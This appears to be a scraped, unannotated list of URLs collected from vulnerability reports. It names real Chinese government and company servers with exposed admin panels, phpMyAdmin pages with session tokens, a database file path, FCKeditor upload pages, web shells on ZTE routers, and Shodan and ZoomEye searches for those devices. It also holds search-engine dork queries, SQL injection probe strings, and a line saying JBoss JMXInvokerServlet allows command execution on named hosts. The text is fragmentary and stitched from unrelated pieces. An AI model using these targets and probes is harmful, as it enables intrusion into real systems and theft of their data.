http://222.135.127.190:7200/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.171.59:8200/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://61.133.119.187:8091/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.76.147:8200/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.127.190:7200/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.171.59:8200/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 url:http://www.sdcec.com/site/Search.aspx?op=2 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemView/DynamicItemView.aspx?CountryName=%E8%92%BF%E6%B3%8A%E7%A4%BE%E5%8C%BA http://222.135.76.147:8200/newsymItemView/DynamicItemView.aspx?CountryName=%E5%90%91%E9%98%B3%E5%9F%A0 http://222.135.127.190:7200/newsymItemView/DynamicItemView.aspx?CountryName=%E5%A4%8F%E5%8D%97%E6%9D%91 http://221.2.149.47:8200/newsymItemView/DynamicItemView.aspx?&CountryName=%E8%99%8E%E5%8F%B0 http://218.59.205.41:8053/newsymItemView/DynamicItemView.aspx?CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/newsymItemView/DynamicItemView.aspx?CountryName=%E6%9E%95%E6%B2%B3%E6%9D%91 http://221.2.171.59:8200/newsymItemView/DynamicItemView.aspx?CountryName=%E8%99%8E%E5%8F%B0 http://221.2.171.59:8200/newsymItemView/DynamicItemView.aspx?CountryName=%E8%99%8E%E5%8F%B0 http://jwh.tanljgzx.gov.cn/newsymItemView/DynamicItemView.aspx?CountryName=%E6%9E%95%E6%B2%B3%E6%9D%91 http://60.217.72.17:7048/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://61.133.119.187:8091/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.76.147:8200/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.127.190:7200/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://www.nongyou.com.cn/ http://61.133.119.187:8091/ckq/pllistOut.aspx?tname=%E8%A5%BF%E8%8B%91%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E8%92%BF%E6%B3%8A%E7%A4%BE%E5%8C%BA http://222.135.76.147:8200/ckq/pllistOut.aspx?tname=%E5%9F%8E%E8%A5%BF%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%90%91%E9%98%B3%E5%9F%A0 http://222.135.127.190:7200/ckq/pllistOut.aspx?tname=%E5%9F%8E%E5%8C%BA%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%A4%8F%E5%8D%97%E6%9D%91 http://221.2.149.47:8200/ckq/pllistOut.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://218.59.205.41:8053/ckq/pllistOut.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/ckq/pllistOut.aspx?tname=%E5%AE%81%E9%98%B3%E7%BB%8F%E6%B5%8E%E5%BC%80%E5%8F%91%E5%8C%BA&CountryName=%E6%9E%95%E6%B2%B3%E6%9D%91 http://60.217.72.17:7048/ckq/pllistOut.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://61.133.119.187:8091/ckq/caiwgkview.aspx?tname=%E8%A5%BF%E8%8B%91%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E8%92%BF%E6%B3%8A%E7%A4%BE%E5%8C%BA http://222.135.76.147:8200/ckq/caiwgkview.aspx?tname=%E5%9F%8E%E8%A5%BF%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%90%91%E9%98%B3%E5%9F%A0 http://222.135.127.190:7200/ckq/caiwgkview.aspx?tname=%E5%9F%8E%E5%8C%BA%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%A4%8F%E5%8D%97%E6%9D%91 http://221.2.149.47:8200/ckq/caiwgkview.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://218.59.205.41:8053/ckq/caiwgkview.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/ckq/caiwgkview.aspx?tname=%E5%AE%81%E9%98%B3%E7%BB%8F%E6%B5%8E%E5%BC%80%E5%8F%91%E5%8C%BA&CountryName=%E6%9E%95%E6%B2%B3%E6%9D%91 http://60.217.72.17:7048/ckq/caiwgkview.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://61.133.119.187:8091/newsymItemView/DynamicItemViewOut.aspx?tname=%E8%A5%BF%E8%8B%91%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E8%92%BF%E6%B3%8A%E7%A4% http://222.135.76.147:8200/newsymItemView/DynamicItemViewOut.aspx?tname=%E5%9F%8E%E8%A5%BF%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%90%91%E9%98%B3%E5%9F%A0 http://222.135.127.190:7200/newsymItemView/DynamicItemViewOut.aspx?tname=%E5%9F%8E%E5%8C%BA%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%A4%8F%E5%8D%97%E6%9D%91 http://221.2.149.47:8200/newsymItemView/DynamicItemViewOut.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://218.59.205.41:8053/newsymItemView/DynamicItemViewOut.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/newsymItemView/DynamicItemViewOut.aspx?tname=%E5%AE%81%E9%98%B3%E7%BB%8F%E6%B5%8E%E5%BC%80%E5%8F%91%E5%8C%BA&CountryName=%E6%9E% http://60.217.72.17:7048/newsymItemView/DynamicItemViewOut.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://61.133.119.187:8091/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.76.147:8200/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.127.190:7200/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.171.59:8200/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/ckq/pllistOut.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://61.133.119.187:8091/ckq/caiwgkview.aspx?tname=%E8%A5%BF%E8%8B%91%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E8%92%BF%E6%B3%8A%E7%A4%BE%E5%8C%BA http://218.59.205.41:8053/newsymItemView/DynamicItemViewOut.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 inurl:nlview.aspx?tname= http://221.2.149.47:8200/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.56.40.229:8045/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.58.124.131:8003/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://jwh.tanljgzx.gov.cn/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84 http://111.17.169.213:801/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://220.181.186.70/cshop/login/login.do http://121.207.251.153/ at.qq.com/js/page/pagecommon.js http://**.**.**/phpmyadmin/_ http://**.**.**/phpmyadmin/index.phptoken=74c16905d99310a87839c3088bdb5b9e_ http://**.**.**/phpmyadmin/index.phptoken=8e7e7fa8b8da563793db7b36c9a62441_ http://**.**.**/phpmyadmin/index.phptoken=f005407f5f7fb388d8596c30622e1f2f_ http://**.**.**/phpmyadmin/index.phptoken=95ffffbba1240da8684620e4edebdd6a_ http://**.**.**/phpmyadmin/index.phptoken=6b228cc9c5c8e72ec01407a140ce2d6e_ http://**.**.**/phpmyadmin/index.phptoken=2ac5f360d1bd393cb8e0de9d74889964_ http://**.**.**/phpmyadmin/index.phptoken=bac890cff4f15341686fa932ccf28d7b_ http://**.**.**/phpmyadmin/index.phptoken=21da468bccd5afda68248bc9abee53c5_ http://**.**.**/phpmyadmin/index.phptoken=dcf623b19fc1a2324b398f08ab2faa8e_ http://**.**.**/phpmyadmin/index.phptoken=2c19c053649eda9cc126f29b3a3a7e4b_ http://**.**.**/phpmyadmin/index.phptoken=3691193c61c6d16fc8383d07fce9d38d_ http://**.**.**/phpmyadmin/index.phptoken=a9a02fd8db60449f7754f6e247f7e0b7_ http://**.**.**/phpmyadmin/index.phptoken=8c9fa011d2c3a917273e4f6214469f86_ http://**.**.**/phpmyadmin/index.phptoken=294b253d780ed75a78df6e16d02e8acb_ http://**.**.**/phpmyadmin/index.phptoken=2e37bb749f11226eae66618a711cc808_ http://**.**.**/phpmyadmin/index.phptoken=34646922033c08b4354722eb14624ccd_ http://**.**.**/phpmyadmin/index.phptoken=5c6ab6bd36f5177899e52d9dce71cebf_ http://**.**.**/phpmyadmin/index.phptoken=2527227a2474529f3d1405b2a8fda79a_ http://**.**.**/phpmyadmin/index.phptoken=fe3831b03ef1fd80cda7fc41e30b5247_ http://**.**.**/phpmyadmin/index.phptoken=f06db5ed7e3af3acc627213b3cff14d0_ http://**.**.**/phpmyadmin/index.phptoken=b8e8687887de29750c2824c0ce4cf61a_ http://**.**.**/phpmyadmin/index.phptoken=8c34264c30ce6417da635b6bb2ca4a01_ http://**.**.**/phpmyadmin/index.phptoken=ee75717dddb932fbb70ae086afb2f223_ http://**.**.**/phpmyadmin/index.phptoken=c481899a64eb682cd93593713a986c4e_ http://**.**.**/phpmyadmin/index.phptoken=7f0bf928e44ea8e2d14b3eba10761f18_ http://**.**.**/phpmyadmin/index.phptoken=aedbb4459ceb06adcb7a342cab5be287_ http://**.**.**/phpmyadmin/index.phptoken=abf50c6d7ee02489d733c80e7af0d6a7_ http://**.**.**/phpmyadmin/index.phptoken=5d895e2e76b09b9f99a53f4e93a54f37_ http://**.**.**/phpmyadmin/index.phptoken=619db76407ffe9ac378d036146833a12_ http://**.**.**/phpmyadmin/index.phptoken=c1a5e0ce2f35b67f1bb8eef0abf5efcd_ http://**.**.**/phpmyadmin/index.phptoken=7f655995be602ff73d945ec6f393a56e_ http://**.**.**/phpmyadmin/index.phptoken=77e3c1cfda3a7e3fdd2d46b3fe5ffe36 http://211.149.151.147/phpmyadmin/info.php http://www.sdzzcz.gov.cn/db/#fgfdszfasad#.mdb http://www.sdzzcz.gov.cn/admin/default.asp http://www.hlsafety.gov.cn/ www.ctce.com.cn http://www.gxgxw.gov.cn/ http://www.gxgxw.gov.cn/CommunicateOnNet/Suggestions/SuggestionAdd.aspx?topicId=3 http://210.75.193.31/main.jsp http://202.108.65.185:8082/js/attention/test.jsp URL:/servlet/kbedit?did=-1 cn:8080/servlet/kbedit?did=-1 http://stgov.my.gov.cn:8080/servlet/kbedit?did=-1 http://egov.pzhzw.gov.cn:8080/servlet/kbedit?did=-1 http://egov.scsn.gov.cn:8080/servlet/kbedit?did=-1 http://egov.zgzw.gov.cn:8080/servlet/kbedit?did=-1 cn:8080/servlet/kbview?qid=-1 cn:8080/servlet/kbedit?qid=-1 http://stgov.my.gov.cn:8080/servlet/kbview?qid=-1 http://stgov.my.gov.cn:8080/servlet/kbedit?qid=-1 http://egov.pzhzw.gov.cn:8080/servlet/kbview?qid=-1 http://egov.pzhzw.gov.cn:8080/servlet/kbedit?qid=-1 http://egov.scsn.gov.cn:8080/servlet/kbview?qid=-1 http://egov.scsn.gov.cn:8080/servlet/kbedit?qid=-1 http://egov.zgzw.gov.cn:8080/servlet/kbview?qid=-1 http://egov.zgzw.gov.cn:8080/servlet/kbedit?qid=-1 http://202.108.65.99/ http://www.ysan.com.cn/ http://www.xxxx.com/admin www.xxx.com www.xxx.com/admin http://www.ysan.com.cn/admin http://www.wzdiao.com/admin/ http://www.jymyms.com/admin/ http://www.jshypj.com/admin/ http://www.tianyuemotor.com/admin/ http://www.dgytblg.com/admin/ http://www.dgmxcy.com/admin http://www.wzlsjy.com/admin/ http://www.lzctkj.com/admin http://www.njlujia.com/admin http://www.szhsddz.net/admin/ http://www.jyhongfa.com/admin/ http://www.jydyy.com/admin/ http://www.jnhlsy.com/admin/ http://www.shhgzs.com/admin/ http://www.rrkfw.com/admin/ http://www.jinhuayuegx.com/admin http://www.shuntaijt.cn/admin/ http://www.xztrh.com/admin/ http://www.xmshetu.com/admin/ http://www.szxyclp.com/admin/ URL:/servlet/kbdelquestion?qids=1&deptIds=null cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://stgov.my.gov.cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://egov.my.gov.cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://egov.scsn.gov.cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://egov.zgzw.gov.cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://edit.mapabc.com www.53kf.com www.53kf.com http://app.home.ifeng.com/index.php/home/search?keyword=%27 http://scm.tmt.tcl.com/fckeditor/_samples/default.html http://php.tsearthquake.sina.com.cn/addok.php http://www.cnoocsafety.com/admin/index.html http://221.2.149.47:8200/newSymSum/VillagePersonal.aspx?tname=%e5%af%bb%e5%b1%b1%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e5%af%bb%e5%b1%b1%e6%9d%91 http://111.17.169.213:801/newSymSum/VillagePersonal.aspx?tname=%e5%82%85%e5%ae%b6%e9%95%87&CountryName=%e5%b0%8f%e7%94%b0%e6%9d%91 http://218.56.40.229:8045/newSymSum/VillagePersonal.aspx?tname=%e9%bb%84%e5%8a%a1%e8%a1%97%e9%81%93%e5%8a%9e&CountryName=%e5%bc%a0%e5%ae%b6%e5%b1%85%e6%b0%91%e5%8c%ba http://222.135.76.147:8200/newSymSum/VillagePersonal.aspx?tname=%e5%9f%8e%e8%a5%bf%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e6%b2%bd%e6%b3%8a%e5%a7%9a%e5%ae%b6 http://222.135.109.70:8200/newSymSum/VillagePersonal.aspx?tname=%e5%ae%8b%e6%9d%91%e9%95%87&CountryName=%e5%8f%b0%e4%b8%8a%e6%9d%91 http://218.59.205.41:8053/newSymSum/VillagePersonal.aspx?tname=%e5%ae%89%e4%b8%b4%e7%ab%99%e9%95%87&CountryName=%e8%91%9b%e5%ae%b6%e5%8f%b0 http://123.134.189.60:8022/newSymSum/VillagePersonal.aspx?tname=%e5%87%a4%e5%9f%8e%e8%a1%97%e9%81%93%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%91%a3%e8%8a%b1%e5%9b%ad%e7%a4%be%e5%8c%ba http://jwh.tanljgzx.gov.cn/newSymSum/VillagePersonal.aspx?tname=%e8%b0%b7%e9%87%8c%e9%95%87&CountryName=%e5%b0%8f%e5%be%90%e5%ba%84%e6%9d%91 http://qhserm.cnooc.com.cn、http://qhserm.cnooc.com.cn:8081、http://qhserm.cnooc.com.cn:8082,jboss后台均未未删除invoker/JMXInvokerServlet导致命令执行漏洞。 url:http://qhserm.cnooc.com.cn,存在invoker/JMXInvokerServlet导致命令执行漏洞,如下: url:http://qhserm.cnooc.com.cn:8081,存在invoker/JMXInvokerServlet导致命令执行漏洞,如下: url:http://qhserm.cnooc.com.cn:8081,存在invoker/JMXInvokerServlet导致命令执行漏洞,如下: http://www.cndns.com/cn/database/sql_frm_getgift_hst.asp?gid=dxnet_mssql150&pstrotprd=sxnetqyy500_1302&pstrotnme=********&pstrotyrs=3&pstcolumn=pstprd2&sqlcheck=2 inurl:i.php?id= http://www.htime.com.cn/i.php?id=7 http://www.huangxinhua.com/i.php?id=4 url:https://122.144.130.98/ https://122.144.130.98/adminscreens/pblsh_data_screen.aspx https://122.144.130.98/adminscreens/prg_data_screen.aspx https://122.144.130.98/userscreens/dwnld_data_screen.aspx https://122.144.130.98/adminscreens/data_type_list.aspx https://122.144.130.98/adminscreens/env_list.aspx https://122.144.130.98/adminscreens/group_list.aspx https://122.144.130.98/adminscreens/user_edit.aspx http://www.cnoocqcs.com/shell.asp http://www.muyingzhijia.com/test.aspx http://biji.baidu.com/inotes/page/publicnew?key=Ym9vays3MzM3MjQ= http://m.jqbar.com/admin/Login.aspx http://www.wine.cn/index.php/Grandcru/detail/g_id/3 http://61.153.213.10/szxy/logon.action http://club.bydauto.com.cn/plugin.php?id=suggest http://www.gzyhg.com/pro.aspx http://www.hhgrd.gov.cn/fckeditor/editor/fckeditor.html http://www.zyxhyj.com/fckeditor/editor/fckeditor.html http://www.mtxqxj.com/fckeditor/editor/fckeditor.html http://www.mtrdb.gov.cn/fckeditor/editor/fckeditor.html http://rhsdszx.com/fckeditor/editor/fckeditor.html http://www.wczzxrmyy.com/fckeditor/editor/fckeditor.html http://zysez.cn/fckeditor/editor/fckeditor.html http://www.lzchaye.com/fckeditor/editor/fckeditor.html http://www.bjzznfz.com/fckeditor/editor/fckeditor.html http://cn.zgldmz.cn//fckeditor/editor/fckeditor.html http://www.gzztgs.com/fckeditor/editor/fckeditor.html http://www.zaxyy.com/fckeditor/editor/fckeditor.html http://www.zggldyx-pz.com/fckeditor/editor/fckeditor.html http://www.mtrdb.gov.cn/fckeditor/editor/fckeditor.html http://www.siteserver.cn/ http://www.picooc.com/picooc/interface/ http://www.picooc.com/picooc/interface/ http://www.picooc.com/picooc/interface/ http://www.51etong.com http://www.epg.huan.tv/default/index# http://www.tjsjjjc.gov.cn/index.html http://ui.letv.com/home.php?mod=space&uid=45236480&do=album&picid=8212 inurl:Y01/ws_xw/info.asp http://www.ybga.gov.cn/ybzgaj/Y01/ws_xw/info.asp?mkbh=M001004 http://www.ybztz.gov.cn/Y01/ws_xw/info.asp?mkbh=M007005 http://www.ybxfj.gov.cn/Y01/ws_xw/info.asp?mkbh=M004001 http://www.ybzhbj.gov.cn/Y01/ws_xw/info.asp?mkbh=M004001 http://www.dhjsj.gov.cn/jsj/Y01/ws_xw/info.asp?mkbh=M004001 http://www.atxga.com/Y01/ws_xw/info.asp?mkbh=M002001 http://www.xy1957.com/y01/ws_xw/info.asp?mkbh=M003001 http://www.dirui.com.cn/Y01/ws_xw/info.asp?mkbh=M001002 http://www.yjbhdl.com/Y01/ws_xw/info.asp?mkbh=M006001 http://www.ybzw.net/Y01/ws_xw/info.asp?mkbh=M004001 http://www.123555.net/Y01/ws_xw/info.asp?mkbh=M004001 http://www.dhsyzx.cn/Y01/ws_xw/f01_info.asp?mkbh=M009001 http://www.dbysjy.com/Y01/ws_xw/info.asp?mkbh=M001002 http://yballvideo.com/Y01/ws_xw/info.asp?mkbh=M002010 http://www.yongzhenfood.com/cn/Y01/ws_xw/info.asp?mkbh=M003001 http://sysmed.cn/china/Y01/ws_xw/info.asp?mkbh=M004001 http://www.jladly.com/Y01/ws_xw/info.asp?mkbh=M006002 http://www.dan-hua.com/cn/Y01/ws_xw/info.asp?mkbh=M004001 http://www.yjweiye.net/Y01/ws_xw/info.asp?mkbh=M001002 http://www.ybyingchi.com/Y01/ws_xw/f03_info.asp?mkbh=M005001 http://www.ybdf.com/www/Y01/ws_xw/info.asp?mkbh=M005003 http://www.ybdadi.com/ybdadi/Y01/ws_xw/info.asp?mkbh=M003001 http://www.caoxianyy.com/cxyy/Y01/ws_xw/info.asp?mkbh=M002001 http://www.yjggqc.com/gjgs/Y01/ws_xw/info.asp?mkbh=M002001 http://www.ybcyyy.net/cyyy/Y01/ws_xw/info.asp?mkbh=M006001 http://www.hebbeilin.com/Y01/ws_xw/info.asp?mkbh=M011007 http://ybczkj2.bjsx30.host.35.com/ybczkj/Y01/ws_xw/info.asp?mkbh=M007001 http://ybczkj2.bjsx30.host.35.com/ybczkj/Y01/ws_xw/info.asp?mkbh=M007001 http://sqlmap.org http://202.108.65.166:8080/ http://t.cntv.cn/?m=api/weibo/action.createFriendship&_=142288703327 display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 http://118.244.158.17:81/DataEdit/AddAuthenType http://118.244.158.17:81/DataEdit/AddIndustry http://118.244.158.17:81/DataEdit/AddScene http://118.244.158.17:81/DataEdit/AddScheme http://www.hzdzj.com/detail.php?title=%B9%AB%B8%E6%C0%B8&id=218&xh=3 http://112.64.196.70:8080/spiderppg/web/index.html http://218.30.99.201/rivues/login.html http://star.finance.ifeng.com/stock/historyReport/?stockCode=sz300041 http://116.255.148.4/UploadFile/635139019915781250.txt http://www.53kf.com/index.php?fromurl=other&controller=union_mall&action=goshop&sid=1052 http://www.53kf.com/index.php?fromurl=other&controller=union_mall&action=goshop&sid=1052%20order%20by%2011 http://www.53kf.com/index.php?fromurl=other&controller=union_mall&action=goshop&sid=1052%20order%20by%2012 http://www.smartcome.com/forum.php?mod=viewthread&tid=1/*111*/union%20select%201%20from/*123*/dual--%201 url:http://chinabluechem.com.cn/ch/ss.asp http://www.hbav.gov.cn/index.html http://cosmetics.ifeng.com/weixin/product/try_detail?try_id=215 http://116.252.37.39:8000/index.html http://ec.yto.net.cn www.0356hua.com www.0356hua.com http://pc01.lib.ntust.edu.tw/ETD-db/ETD-search-c/view_etd?URN=etd-0128113-140846 http://153.0.69.228/。 http://153.0.69.228/web_shell_cmd.gch https://www.shodan.io/search?query=Mini+web+server+1.0+ZTE&1 http://www.lykygs.com http://www.lykygs.com/phpmyadmin/scripts/ http://www.lykygs.com/ticket/log.txt http://www.lykygs.com http://www.zoomeye.org/search?q=%22Mini%20web%20server%201.0%20ZTE%22&p=4&t=host http://153.0.72.9/web_shell_cmd.gch 